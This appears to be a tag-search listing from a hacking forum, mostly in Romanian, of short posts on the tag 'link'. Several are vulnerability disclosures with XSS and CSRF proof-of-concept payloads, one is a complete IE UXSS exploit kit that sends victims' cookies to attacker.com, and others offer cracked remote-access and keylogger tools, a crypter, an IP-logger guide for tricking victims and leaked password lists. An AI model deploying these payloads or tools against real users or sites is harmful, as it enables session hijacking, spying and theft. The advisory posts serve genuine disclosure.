Search the Community
Showing results for tags 'link'.
-
Hi Team, #Affected Vendor: https://www.php-fusion.co.uk/home.php #Date: 04/05/2015 #Creditee: http://osvdb.org/creditees/13518-vadodil-joel-varghese #Type of vulnerability: Persistent XSS + Clickjacking #Tested on: Windows 8.1 #Product: PHP Fusion #Version: 7.02.07 #1 Cross Site Scripting x-x-x-x-x-x-x-x-x-x-x-x- #Tested Link: http://localhost/PHPfusion/files/administration/custom_pages.php?aid=68bca08161175b0e #Description: PHP Fusion is vulnerable to stored cross site scriting vulnerability as the parameter "page_content" is vulnerable which will lead to its compromise. #Proof of Concept (PoC): page_title=%22%3E%3Cimg+src%3D%22blah.jpg%22+onerror%3D%22alert%28%27pWnEd%27%29%22%2F%3E&page_access=0&page_content=%22%3E%3Cimg+src%3D%22blah.jpg%22+onerror%3D%22alert%28%27pWnEd%21%21%27%29%22%2F%3E&add_link=1&page_comments=1&page_ratings=1&save=Save+Page #2 UI redress attack x-x-x-x-x-x-x-x-x-x-x #Tested Link: http://localhost/PHPfusion/files/viewpage.php?page_id=5 #Description: PHP Fusion is vulnerable to UI redress attack as multiple transparent or opaque layers can be used to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. #Proof of Concept (PoC): <iframe src=" http://localhost/PHPfusion/files/viewpage.php?page_id=5" sanboxed width=900 height=900> Please check me out !!!! </iframe> -- Regards, *Joel V* Source
-
Templates WHMCS Mini Pack (17) Link download : https://app.box.com/s/lstbknvjabk6vjyuzlqf63siys5so1s3 Am pus si whmcs 5.3.11 nulled pentru cei intresati. Link download WHMCS : https://app.box.com/s/87odh88pyxqh58tg2k859afw4n6xr49p Spor la treaba !
-
Salut. Am gasit pe un forum de hacking o noua metoda SEO. Link: Rank1 301 redirect - 62422bde
-
Title: Stored XSS Vulnerability in Add Link to Facebook Wordpress Plugin Author: Rohit Kumar Plugin Homepage: http://wordpress.org/extend/plugins/add-link-to-facebook/ Severity: Medium Version Affected: Version 1.215 and mostly prior to it. Version Tested: Version 1.215 Version Patched : 1.215 Description: Vulnerable Parameter 1. App ID 2. App Secret 3. Custom Picture URL 4. Default Picture URL 5. URL News Feed Icon About Vulnerability This plugin is vulnerable to Stored Cross Site Scripting Vulnerability. This issue was exploited when user accessed to Add Link to Facebook Settings in Wordpress with Administrator privileges. A malicious administrator can hijack other users sessions, take control of another administrators browser or install malware on their computer. Vulnerability Class: Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) Steps to Reproduce: After installing the plugin: Goto Settings All in One Facebook Input this payload in App ID :- ><script>alert(1)</script> Click on the Save button. After reloading the page you will see a Pop Up Box with 1 written on it. Reload the page again to make sure its stored. Change Log https://wordpress.org/plugins/add-link-to-facebook/changelog/ Disclosure 09th March 2015 Source: http://packetstorm.wowhacker.com/1504-advisories/wpfacebook-xss.txt
-
????????????????????????????????????????? jSpy v0.33 - Cracked by Anonymous Link Scan :::... VirusCheckMate.com free virus scanner online Download Link : ??? jSpy - Cracked by Anonymous - Download - 4shared - Ardamax Keylogger v3.5.3 + Serial Ardamax Keylogger v3.5.3 + Serial pass:: PM
-
Cost? 1.99€ ?i pute?i folosii ?i codul PROMODOM pentru un discount de 5%. Link: Inregistrare Domenii Web - Gazduire.Com.Ro
-
Crypter Breaking Bad V2 SCAN link download:::... https://www.sendspace.com/file/h9ynqc hint:: > JAPOO C2 < ? ? ? ? ? ? ? ? ? ? ? ?
-
Daca poate cineva sa imi trimita un link de download la cartea asta as fi recunoscator ... Introduction to Finite Element Analysis Using Creo Simulation 1.0: Randy Shih: 9781585036707: Amazon.com: Books
-
Este cineva interesat de un link ex ? Am un site de filme online , este in crestere . Link-ul il dau in pm , nu fac reclama mascata aici
-
Hi Team, #Affected Vendor: http://lcms.chamilo.org/ #Date: 27/03/2015 #Discovered by: Joel Vadodil Varghese #Type of vulnerability: XSRF #Tested on: Windows 7 #Product: LCMS Connect #Version: 4.1 #Description: Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. Chamilo LCMS is a completely new software platform for e-learning and collaboration. The application is vulnerable to XSRF attacks. If an attacker is able to lure a user into clicking a crafted link or by embedding such a link within web pages he could control the user's actions. #Proof of Concept (PoC): ------------------------------------ <form method="POST" name="form1" action=" http://localhost:80/Chamilo/index.php?application=menu&go=creator&type=core\menu\ApplicationItem "> <input type="hidden" name="parent" value="0"/> <input type="hidden" name="title[de]" value=""/> <input type="hidden" name="title[en]" value="tester"/> <input type="hidden" name="title[fr]" value=""/> <input type="hidden" name="title[nl]" value=""/> <input type="hidden" name="application" value="weblcms"/> <input type="hidden" name="submit_button" value="Create"/> <input type="hidden" name="_qf__item" value=""/> <input type="hidden" name="type" value="core\menu\ApplicationItem"/> </form> -- Regards, *Joel V* Source
-
A security researcher says there is a bug in the Instagram API that could enable an attacker to post a message with a link to a page he controls that hosts a malicious file, but when the user downloads the file it will appear to come from a legitimate Instagram domain, leading the victim to trust the source. The issue, a reflected filename download bug, lies in the public API for the Instagram service, which is owned by Facebook. Researcher David Sopas of WebSegura in Portugal found that by using the access token from any user’s account, pasting some code into the bio field in a user’s account and using some other little tricks, he could produce a file download link that seems to be hosted on a legitimate Instagram domain. “This time I found a RFD on Instagram API. No need to add any command on the URL because we will use a persistent reflected field to do that. Like “Bio” field on the user account. What we need? A token. No worries we just need to register a new user to get one,” Sopas wrote in a post explaining the bug and exploitation technique. “Next step: Insert the batch command we want to use in the user account Bio field [and maybe others]. I’ll try to open a Chrome new window with a malicious page disabling most the protections from this browser.” Sopas found that the technique works on Chrome, Opera, Chrome for Android, the Android stock browser and Firefox in some circumstances. In order to make it work, he also constructed a specific filename, and when a victim clicks on a link in the attacker’s Instagram message, she will be taken to an attacker-controlled page with a file that appears to be on an Instagram domain. The video above demonstrates the technique. The attacker could host any malicious file he chooses at the target location, including malware. Sopas said he has been unable to convince Facebook security engineers that RFD issues are security vulnerabilities. He said they told him the issue was not a priority. “Many companies still don’t understand that RFD is very dangerous and combined with other attacks like phishing or spam it could lead to massive damage,” Sopas said via email. “[imagine] a phishing campaign where the link of the email is really from Instagram?” Source
-
Enter a URL to forward your recipient to. Give them the link that Blasze generates. (Optional) Put the link through Bit.ly for more secrecy. Save the statistics URL provided or the code. Return and enter the code to see your link stats and the IP addresses that accessed it. Sfat ? Cand dati URL-ul victimei treceti cu URL-ul prin tinyurl sau bit.ly , Link ? Blasze IP Logger
-
Link: Proxies.txt at Share Send
-
free Socks 4, Socks 5, HTTP, and HTTPS with anonymity levels ranging from none to high. link: Proxy Lust enjoy
-
Fara PM ... Nu vand ! Link : https://www.sendspace.com/file/nmcnoh Sunt gasite pe un RDP
-
Înva?? engleza gratuit. Pentru întotdeauna. Link : https://www.duolingo.com Ar trebui unu si pentru Romana
-
We’re on a mission to make your working life simpler, more pleasant and more productive. Link : https://slack.com/pricing - 0$
-
Contul il gasesti in link Screenshot by Lightshot
-
Scam can be found at: hxxp://vikingwebscanner.com/ron2/adw/ executable attached Link download: HERE Pass: infected Source
-
Salut, Daca aveti nevoie de un cupon pentru bine, puteti face cerere pentru unul de 50$ gratuit. Link PS : La companie puteti trece orice.
-
Just a moment... doar Email Adres.
-
Cookie hijacking: Internet Explorer UXSS (CVE-2015-0072) Host below files on webserver (attacker.com) and share the exploit link with victims, exploit.php --- exploit link (Share with victim) redirect.php --- Script to redirect on target page (target page should not contain X-Frame-Options or it will fail) delay.php --- Script to add delay collector.php --- Script to collect hijacked cookie log.txt --- Collected cookies will be stored in this text file -------------------------------------exploit.php----------------------------------- <iframe src="redirect.php" style="display:none"></iframe> <iframe src="https://target.com/" style="display:none"></iframe> <script> top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","http://attacker.com/delay.php",false),send();_.location="javascript:bkp=\'http://attacker.com/collector.php?\'+document.cookie;alert(bkp);window.location(bkp);"'); </script> -------------------------------------------------------------------------------------- -------------------------------------redirect.php----------------------------------- <?php header("Location: https://target.com/"); exit(); ?> -------------------------------------------------------------------------------------- -------------------------------------delay.php----------------------------------- <?php sleep(15); echo 'Bhdresh'; exit(); ?> -------------------------------------------------------------------------------------- -------------------------------------collector.php----------------------------------- <?php $f = fopen("log.txt", 'a'); fwrite($f, $_SERVER["REQUEST_URI"]."\n"); fclose($f); header("Location: http://www.youtube.com/"); ?> -------------------------------------------------------------------------------------- -------------------------------------log.txt----------------------------------- - Create a file as log.txt and modify the permissions (chmod 777 log.txt) -------------------------------------------------------------------------------------- Demo: facabook.net16.net/exploit.php Reference: http://innerht.ml/blog/ie-uxss.html Source
-
https://xato.net/passwords/ten-million-passwords/#.VNojTNKsU7U Aveti la sfarsitul articolului un link de download. Enjoy
.thumb.jpg.29b1f7ae7dd9ad5a11e41a710722ba35.jpg)
